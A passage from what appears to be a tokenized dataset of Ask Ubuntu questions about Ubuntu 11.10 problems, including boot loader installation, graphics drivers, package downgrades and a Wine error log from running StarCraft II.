iso file download from the official website : i 've tried the option to install along windows with a g : drive in fat32 , ext2,3 and 4 , i 've tried to leave unallocated data , without the driver g at all ... appears this everytime : http : //i.stack.imgur.com/eo2ie.png pres ok it ask me to : not possible to install the boot loader at the location : specify new location : i 've tried to select all the drivers non is accepted if i ask to continue without installing the boot loader he ask me to install later by myself which i 'm trying to figure it out but i 'm not really good to understand how ppl get to the programming part like a dos to write down couse i 'm a newb and i 've dont work on dos or linux before ... i 've read that the boot loader has to be installed on the primary partition , but i 'm not sure what i can delete from those 2 partitions that would let me get 1 extra ... and it seems that the one that windows use is protected to write down so the software is not touching it ... please if someone have any idea to help me out ... i 've got a course tomorrow of how to use the software to analyze the data and i wanted to take my computer with me , so i 've passed the last 3 days trying to search different ways to solve . my question is also post on the bugs.launchpad.net link here : lounchpad.net bug # 882695
73039	is it possible to remove or replace google search in gnome shell 's dash ?	i am have made a couple of posts about gnome 3.2 . and i know its not technically finished yet . not necessarily beta anymore , but still a huge list of things missing and big gap left for built in customizablity ( no i do not consider the gnome tweak tool as `` built in '' . that being said , i love it so far ! : -d i really like the idea of being able to do a web search on ( `` insert favorite search engine name `` , mine just so happens to be duckduckgo.com ) straight from the desktop . but google and wikipedia are the only ones there and i have heard of no extentions or changeable settings/conf files for this . is it possible to remove and/or add new search engines to these options ? ( highlighted below ) obviously doing it the manual way requires knowing what the search url would be so that your search term would be automatically inserted and then open the browser , but with duckduckgo they have great pages about what url to use where for these kinds of things . so no big deal there . what do you guys think ? up to the challenge ? ; - )
73043	how do i unbind super key from menu in lubuntu	i just installed lubuntu 11.10 . i spend quite a bit of time in emacs , and i have a bunch of key bindings that rely on the super key . however , lubuntu captures the super key press and opens the main menu every time . this is quite frustrating . how i do i unbind this super key behavior ? i 've tried tweaking lubuntu-rc.xml with no luck .
73044	ubuntu does not recognize my geforce 540m	when i go into system info , it says `` graphics unknown '' . can ubuntu 11.10 be made to recognize my 540m geforce driver ? does it matter ? unity seems to be working fine ( i installed bumblebee ) .
73048	how can i set up a dynamic dns fetching service on ubuntu server ?	i 've created accounts and hostnames within my http : //no-ip.org/ account , which is by far the most commonly used service for my type of server . can somebody walk me through the configuration process of using ddclient with no-ip , as i 'm a command line noob ?
73052	how to modify `` /etc/bash.bashrc '' ? it is read only ?	trying to modify /etc/bash.bashrc i get an error : $ echo `` my edit '' > > /etc/bash.bashrc bash : /etc/bash.bashrc : permission denied ls -ll /etc/bash.bashrc shows : -rw-r -- r -- 1 root root 1975 2011-05-18 19:54 /etc/bash.bashrc how could i modify /etc/bash.bashrc ?
73057	can not access nvidia-settings or use hdmi with quadro 3000m	i 've just done a fresh install of oneiric on a dell precision m6600 with a nvidia quadro 3000m . i can log in to unity 3d , but if i try to start nvidia-settings , i 'm told `` you do not appear to be using the nvidia x driver '' . also , hdmi out does n't work . the automatically generated xorg.conf is very short and does n't appear to be using the nvidia driver : section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection however , if i run nvidia-xconfig , it will replace the xorg.conf with , among other things , driver `` nvidia '' line , but when i restart the computer , lightdm wo n't even start at all . this all occurs whether i activate nvidia-current or nvidia-current-updates by the `` additional drivers '' gui . in either case , the gui says `` this driver is currently activated and in use '' . ( obviously not ) . how should i go about getting nvidia-settings and hdmi-out to work ? thanks !
73059	how to copy & paste from ubuntu virtualbox guest to windows host ?	i am running virtualbox 4.1.4 on my windows 7 laptop , running an ubuntu 11.10 guest . i would like to copy text from ubuntu 's terminal and paste it into a file on the windows host . this does n't work for some reason . any ideas ?
73068	instructions to mount an internal hard drive ?	how do you mount an internal hard drive ? i have a 500gb internal hard drive that has both linux and windows 7 . upon booting up i decide which one to use . my windows 7 os has a user , which requires me to enter a password for upon logging in . how would i mount an internal hard drive to access the files stored in that user 's account ( i have the user 's password ) ? also , can you please give me instructions using fdisk instead of gparted ?
73070	ubuntu 3d not working	i am running ubuntu 11.10 on virtualbox 4.1.4 with an i7 dual-core macbook pro 15 '' and 8 gb ram . while ubuntu 11.04 was running fine with the 3d option , the new 11.10 version is not working .
73071	online video playback in all browsers halting and unwatchable	at first i thought this might be a firefox issue , but i get the same problem in chrome , so it seems to be more system wide . when i try to play any online video , particularly youtube , the audio plays fine , but the video holds on one frame indefinitely . sometimes it suddenly speeds up to catch up with the audio , but then freezes again . it is , in short , unwatchable . i tried the solution offered here , but with the gnash player installed , online videos will not play . this was not a problem before , and i think something has gone wrong with a recent upgrade . i have the non-free flash player installed , as well as ubuntu-restricted-extras . how can i get video to play again ?
73074	intel hd graphics card not recognized in system info	when i check the info of my laptop , it shows me `` graphics unknown '' : can anyone help me resolve this ?
73077	is memory leak a common phenomenon for gnome-shell ?	everyone says that gnome-shell uses much less memory than unity shell . but i find it is true only for a short period time . under ubuntu 11.10 , gnome-shell 3.2 , the cron `` gnome-shell '' uses about 40~60mb memory when logging in . then it keeps increasing slowly but steadily . several hours later it uses memory about 600~800mb and sometimes up to 1gb ! i 've heard such `` memory leak '' on internet . is it a native bug of gnome-shell ? how to fix it ?
73084	dropping internet and display frozen	i have a toshiba satellite with an amd c-50 processor , 4 gig of ram , amd radeon hd 6250 graphics . dualboot with win 7 64-bit , ubuntu 11.10 64-bit . internet always disconnects ( wired connection ) after couple of minutes . downloads and general internet use is slow . always a problem with my screen . it suddenly freezes and there is some moving snow ( like a tv when there is no signal ) with a faint background of the normal screen behind the snow ! i 'm a normal user , so i do n't know how to use the shell to play in ubuntu . win 7 use is perfect , no problems like that . is there someone who knows how to fix these problems ? thank you
73087	problems while using update manager	i am getting the following messages while using update manger ... how to resolve this ? ? the following packages have unmet dependencies : libcaribou0 : depends : libc6 ( > = 2.3.6-6~ ) but 2.13-20ubuntu5 is installed depends : libgee2 ( > = 0.5.0 ) but 0.6.2.1-0ubuntu1 is installed depends : libglib2.0-0 ( > = 2.27.5 ) but 2.31.0-0ubuntu1~oneiric1 is installed depends : libgtk-3-0 ( > = 3.0.0 ) but 3.2.1-0ubuntu1~11.10~ricotz0 is installed depends : libxklavier16 ( > = 5.1 ) but 5.1-1ubuntu1 is installed depends : libxml2 ( > = 2.7.4 ) but 2.7.8.dfsg-4 is installed depends : libcaribou-common ( = 0.4.1-0ubuntu1~11.10~ricotz0 ) but it is not installed
73092	how do i downgrade libglib2 ? ( from glib 2.31 to 2.30 ? )	edit : new formulation of the question i have the wrong version of libglib2 installed . i had some experimental repo that broke everything . from this source , https : //bugs.launchpad.net/ubuntu/+source/eog/+bug/880227 i have learned that other people have addressed this bug by downgrading the libglib2 package . however , i do n't know how to do this . when i go to synaptic , and search for libglib2 , i am met with many packages , rather than just one to downgrade , including : libglib2.0-doc libglib2.0-dev libglib2.0-cil libglib2.0-0 libglib2.0-bin libglib2.0-data which of these gets downgraded for 2.30 ? all of them ? is one the master ? secondly , assuming i do choose libglib2.0-0 , i face another problem : when i force version , synaptic warns me that the chosen action will affect other packages , and that 14 packages will be removed . these include ... to be removed : gir1.2-totem-1.0 libatk1.0-dev libcairo2-dev libgdk-pixbuf2.0-dev libglib2.0-bin libglib2.0-dev libgtk-3-dev libpango1.0-dev libtotem0 totem totem-mozilla totem-pugins ubuntu-desktop unity i do n't know what most of these are , but i 'm fairly sure that ubuntu-desktop and unity are very important , and i do n't want them removed . how do i deal with this ? is it safe to proceed in the downgrade even though ubuntu-desktop will be removed ? will it safely and intelligently reinstall and update itself ?
73096	how to make applications pinned in launcher appear for all users ?	i need to pin an application in unity launcher such that it can be seen for all users . currently , everything i changed seems to only affect the local user .
73097	`` not enough free swap '' error when trying to hibernate	i recently upgraded from 11.04 to 11.10 , but i get `` not enough free swap '' error when trying to put my laptop to hibernation . i have 2gb of physical memory and 3gb of swap . besides , the hibernate worked fine in 11.04 . and the memoinfo is here : swapcached : 0 kb swaptotal : 4028604 kb swapfree : 4028604 kb so what might be the problem ?
73100	how to compare zip files ' contents ?	is there any tool to compare zips by content ? maybe some krusader addon or command-line magic ?
73107	unable to change the launcher icon size	after upgrading to 11.10 i ca n't change the launcher icon size to smaller . i 've tried to change it using ccsm , like described in how can i configure unity , but the changes take no effects ( restarted , tried sudo - still big icons ) . in the previous version of ubuntu this solution worked . how can i change the icon size ? ( btw , how can i know which unity ( 2d vd 3d ) i 'm running and switch between ? ) . edit : looks like i 'm using unity 2d and have some problems with graphics : me @ my-laptop ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : unable to create the opengl context edit 2 me @ my-laptop ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 310m ] ( rev a2 )
73109	launcher icons on desktop or in the main panel	is there any way to simply add launcher icons such as firefox , gimp , etc . onto the desktop or into the gnome panel ? i know that possible way how to do that is to run this command : gnome-desktop-item-edit -- create-new /home/profile/desktop but it 's too slowly and annoying writing this command whenever you want to add some icon ... thanks . i use ubuntu 11.10 - gnome shell
73110	how do i disable the fancy graphic effects ?	i have set up an ubuntu 11 virtual machine , and i think that the pretty , animated ui is making it much slower ( everything flickers and seems unresponsive ) . i would like to disable this and make the ui as simple as possible , so it works well inside virtual box , but i am not familiar with ubuntu . can you guys help ? also , if you have any other tips to make the install work better as a vm , please share them
73112	downgrading from ubuntu 11.10 to 10.10 , keeping installed programs	i recently upgraded from 10.10 to 11.04 then 11.10 , and i 'd like to revert back to 10.10 . i understand that you can not downgrade a version as easily as you can upgrade , and that i 'll probably have to get the boot cd again and reinstall the whole thing . i know that i can keep most of my files by saving the /home directory , so 2 questions : once i 've gone back to 10.10 , can i juts copy my old version of home over the freshly installed one ? is there a way to keep all of my installed programs , or some sort of way of getting the new install to automatically install them ? will i have to go through the tricky setups of things like tex all over again ? thanks
73116	how can set up a file sharing server to allow remote access over a wan ?	i want to set up a server to allow remote access over a wan . the purpose is to allow people to remote connect and download specific files from a specified folder hosted on the server . is there software available to achieve this , preferably with an interface so i can easily add and remove users , plus monitor who is connected at any time ? i have looked around and only found terminal references , and not very clear how to set up . i have a service running on my win server , but i am hoping to move from that to ubuntu for my file sharing . i do not want people who access the server to have any local accounts or any access to any folder/files apart from authorised folders/files . thanks
73117	unable to resume after screen has locked	i am not able to resume a session after the screen has been locked for a long time . this is not a new problem . similar questions have been posted in the past , two of which are listed below . black screen after screen lock screens do n't work after shutting off this problem has also been reported to ubuntu , who have provided the following wiki link for guidance . debuggingkernelsuspendhibernateresume one cause of the problem that is noted in debuggingkernelsuspendhibernateresume is when the swap file is encrypted . this will automatically happen if one decides to encrypt the /home directory during installation . as i did not choose this option , i do n't believe that my swap file is encrypted , however , i have encrypted the home directories of the windows xp partition which resides on a separate drive . not sure if this is an issue but , how would i be able to determine whether or not the swap space partiion under ubuntu has been encrypted ? the solution noted by @ cprofitt in his/her answer to screens do n't work after shutting down mentions modifying xorg.conf , and possibly grub . unfortunately , i can not locate the xorg.conf file on my system . it is not in the typical locations that one would expect to find it ( e.g . /etc/x11 ) . also , i am not certain how to modify grub . as a workaround , i have turned off screen locking , however , i would really like to solve this problem . my configuration is as follows : ubuntu 11.10 vga compatible controller : intel corporation 82865g integrated graphics controller ( rev 02 ) also note that i have a kbm switch that switches between the pc and a mac os x laptop . i know for a fact that this is not a problem since , i am still able to switch to my laptop when the problem occurs . furthermore , i have physically connected a keyboard and mouse to the pc where i have installed ubuntu , and the problem still occurs .
73118	starcraft ii , wine , ironhide	asus n43jm notebook nvidia geforce gt 435m ubuntu 11.10 64bit switchable graphics , working through ironhide ironhide settings : automatic shutdown of nvidia card : no virtual terminal : 8 image transport : xv read back mode : pbo log file for virtualgl : /dev/null powersave/economic mode : no always enable the nvidia card before disabling : yes when i try to run startcraft ii using : ~ $ optirun wine `` c : /starcraft2/starcraft ii.exe '' the game starts . the video lags , but the games runs kind of smooth if i have all of the graphics settings turns to the lowest . i 'm wondering if i could get the graphics quality higher , and if there 's something not working properly . it lags enough that it has trouble loading missions or even moving around to different screens sometimes . hangs when shutting the game off . i get this ( some repeating commands were deleted to make room ) * starting ironhide x server ironhide _ps0 enabling nvidia card succeded . . [ ok ] error : ld.so : object 'libdlfaker.so ' from ld_preload can not be preloaded : ignored . err : winediag : wined3d_dll_init the glsl shader backend has been disabled . you get to keep all the pieces if it breaks . fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x32dca0 ) : stub fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x107c2e4,0x00000000 ) , stub ! fixme : ddraw : directdrawenumerateexa flags 0x00000003 not handled fixme : wininet : internetsetoptionw option internet_option_connect_timeout ( 3000 ) : stub fixme : wininet : internetsetoptionw internet_option_send/receive_timeout/data_send_timeout 3000 fixme : wininet : internetsetoptionw option internet_option_connect_timeout ( 2000 ) : stub fixme : wininet : internetsetoptionw internet_option_send/receive_timeout/data_send_timeout 2000 fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x137c650 ) : stub fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x137c63c ) : stub fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x147e998 ) : stub fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x147e998 ) : stub error : ld.so : object 'libdlfaker.so ' from ld_preload can not be preloaded : ignored . fixme : shell : setcurrentprocessexplicitappusermodelid l '' blizzardentertainment.starcraftii.starcraftii '' : stub error : ld.so : object 'libdlfaker.so ' from ld_preload can not be preloaded : ignored . shui @ shui-n43jm : ~ $ err : winediag : wined3d_dll_init the glsl shader backend has been disabled . you get to keep all the pieces if it breaks . fixme : process : setprocessdeppolicy ( 1 ) : stub fixme : process : getlogicalprocessorinformation ( 0x33fa3c,0x33fd3c ) : stub fixme : hnetcfg : fw_profile_get_firewallenabled 0x174588 , 0x461f0d4 fixme : process : getprocessworkingsetsize ( 0xffffffff,0x461ed40,0x461ed44 ) : stub fixme : ntdll : ntquerysysteminformation info_class system_performance_information fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x461e9f4,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x461e908,0x00000000 ) , stub ! fixme : d3d : debug_d3dformat unrecognized 0x36314644 ( as fourcc : df16 ) wined3dformat ! fixme : d3d : wined3d_get_format ca n't find format unrecognized ( 0x36314644 ) in the format lookup table fixme : d3d : debug_d3dformat unrecognized 0x36314644 ( as fourcc : df16 ) wined3dformat ! fixme : d3d : wined3d_get_format ca n't find format unrecognized ( 0x36314644 ) in the format lookup table fixme : d3d : debug_d3dformat unrecognized 0x34324644 ( as fourcc : df24 ) wined3dformat ! fixme : d3d : wined3d_get_format ca n't find format unrecognized ( 0x34324644 ) in the format lookup table fixme : d3d : debug_d3dformat unrecognized 0x34324644 ( as fourcc : df24 ) wined3dformat ! fixme : d3d : wined3d_get_format ca n't find format unrecognized ( 0x34324644 ) in the format lookup table fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x461e7c0,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x461e798,0x00000000 ) , stub ! fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : thread : setthreadidealprocessor ( 0xfffffffe ) : stub fixme : thread : setthreadidealprocessor ( 0xfffffffe ) : stub fixme : thread : setthreadidealprocessor ( 0xfffffffe ) : stub fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : alsa : audioclient_getmixformat do n't know what to do with 32 channels , pretending there 's only 2 channels fixme : alsa : audioclient_getmixformat do n't know what to do with 10000 channels , pretending there 's only 2 channels fixme : avrt : avsetmmthreadcharacteristicsw ( l '' audio '' ,0x869ea18 ) : stub fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d9 : direct3dshadervalidatorcreate9 stub fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : winhttp : winhttpgetieproxyconfigforcurrentuser returning no proxy used err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 fixme : winsock : wsaioctl ws_sio_udp_connreset stub fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x4612cb4,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x4612f84,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x4612f74,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x4612d08,0x00000000 ) , stub ! fixme : alsa : audioclient_getmixformat do n't know what to do with 32 channels , pretending there 's only 2 channels fixme : avrt : avsetmmthreadcharacteristicsw ( l '' audio '' ,0x2575ea18 ) : stub fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : winhttp : winhttpgetieproxyconfigforcurrentuser returning no proxy used fixme : imm : immreleasecontext ( 0x50038 , 0x17de90 ) : stub err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 2481 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_allocate_surface > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedteximage2darb @ surface.c / 2589 err : d3d_surface : surface_upload_data > > > > > > > > > > > > > > > > > gl_invalid_enum ( 0x500 ) from glcompressedtexsubimage2darb @ surface.c / 